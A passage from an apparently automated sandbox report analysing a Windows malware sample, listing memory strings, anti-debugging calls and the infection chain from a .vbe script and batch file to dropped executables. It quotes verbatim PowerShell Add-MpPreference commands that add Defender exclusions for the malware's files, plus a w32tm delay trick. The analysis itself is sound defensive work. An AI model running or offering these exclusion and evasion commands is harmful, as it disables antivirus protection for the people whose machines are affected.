8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]S
                                    Source: Ccp3sJPDXs.exe, 00000000.00000003.2202780401.0000000002D73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: wscript.exe, 00000002.00000003.2247084849.0000000002FAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                                    Source: wscript.exe, 00000002.00000003.2247084849.0000000002FAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e
                                    Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3571574275.000000001B650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                                    Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3563942137.0000000013489000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                    Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3563942137.0000000013489000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]S
                                    Source: w32tm.exe, 00000017.00000002.2372674605.000002B9FED37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeAPI call chain: ExitProcess graph end nodegraph_0-25069
                                    Source: C:\SavesHost\Blockbrowser.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007EF838
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007F7DEE mov eax, dword ptr fs:[00000030h]0_2_007F7DEE
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007FC030 GetProcessHeap,0_2_007FC030
                                    Source: C:\SavesHost\Blockbrowser.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007EF838
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EF9D5 SetUnhandledExceptionFilter,0_2_007EF9D5
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007EFBCA
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007F8EBD
                                    Source: C:\SavesHost\Blockbrowser.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe'
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe'
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe'
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe'
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe'
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe'
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\SavesHost\Blockbrowser.exe "C:\SavesHost/Blockbrowser.exe"Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe'Jump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe "C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe"
                                    Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EF654 cpuid 0_2_007EF654
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_007EAF0F
                                    Source: C:\SavesHost\Blockbrowser.exeQueries volume information: C:\SavesHost\Blockbrowser.exe VolumeInformationJump to behavior
                                    Source: C:\SavesHost\Blockbrowser.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
